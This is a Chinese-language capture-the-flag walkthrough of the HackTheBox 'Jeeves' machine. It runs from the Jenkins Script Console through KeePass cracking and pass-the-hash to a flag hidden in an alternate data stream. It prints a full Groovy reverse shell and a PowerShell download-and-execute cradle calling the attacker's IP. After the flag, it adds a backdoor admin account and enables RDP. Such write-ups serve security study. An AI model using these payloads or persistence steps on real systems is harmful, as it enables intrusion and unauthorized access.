Skip to content

Latest commit

 

History

History
187 lines (89 loc) · 9.02 KB

HackTheBox-windows-Jeeves.md

File metadata and controls

187 lines (89 loc) · 9.02 KB
Raw

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 66 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/114

靶机难度:中级(5.0/10)

靶机发布日期:2017 年 12 月 20 日

靶机描述:

Jeeves is not overly complicated, however it focuses on some interesting techniques and provides a great learning experience. As the use of alternate data streams is not very common, some users may have a hard time locating the correct escalation path.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.63.....

nmap 发现开放了 IIS server, RPC, Microsoft-ds 和 Jetty 服务...

直接对 50000 端口的 http 进行爆破,发现存在、/askjeeves 目录...80 端口没扫到什么有用的...

访问进来,发现存在 Jenkins Manage... 应该能上传 shell 的地方...

发下在 Script Console 存在 Jenkins 语句写入...

方法 1:

String host="10.10.14.18";
int port=6666;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

可以看到,直接获得低权 shell...

方法 2:

cmd = """ powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.18/dayu.ps1') """
println cmd.execute().txt

可以看到利用 nishang 脚本进行提权... 成功

方然还可以利用 nc.exe 去提权... 等等

成功获得 user.txt 信息...

可以看到在 Documents 目录,看到 CEK.kdbx 的文件,本地开 smb 服务... 然后共享过来即可...

keepass2john CEH.kdbx > dayu.hash 使用 keepass2john 从密钥文件中提取哈希值... 然后利用 john 破解哈希值...

moonshine1

获得密码 monshine1,可以访问密码管理器了,这里使用 keepass2 进入密码管理器... 成功进入...

发现了 administrator 密码... 发现登陆不上去,是错的...

这里可利用的是 Backup 的密码,这是 Windows NTLM 哈希,可以通过哈希值进行攻击...

可以看到成功通过 winexe 来执行账号哈希值攻击... 成功登录...

本地并没有看到 root.txt,却看到了 hm.txt 文件... 提示说 flag 在更深处... 继续挖坑...

隐藏在数据流中...

成功获得了 root.txt 文件...(虽然完成了任务,但是还没结束...)

最近有人说我文章很水,我很努力了,给你们拓展知识点了...

这是 HTB 上的靶机,在国外服务器上... 我们进去玩玩??

这里以管理员身份创建了新的用户 dayu... 然后提升 dayu 用户的权限... 拉倒 administrator 组里...

然后在本地启动远程桌面允许...

最后需要告诉 Windows 靶机的防火墙允许我们远程桌面连接...

输入前面创建的用户名密码即可...

可以看到进来了... 就看看哈,别搞事情...

进去太卡了,因为我的网络不是特别好... 可以在 administrator 桌面查看到数据流 hm.txt:root.txt 文件... 利用 get-item 查看即可...

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号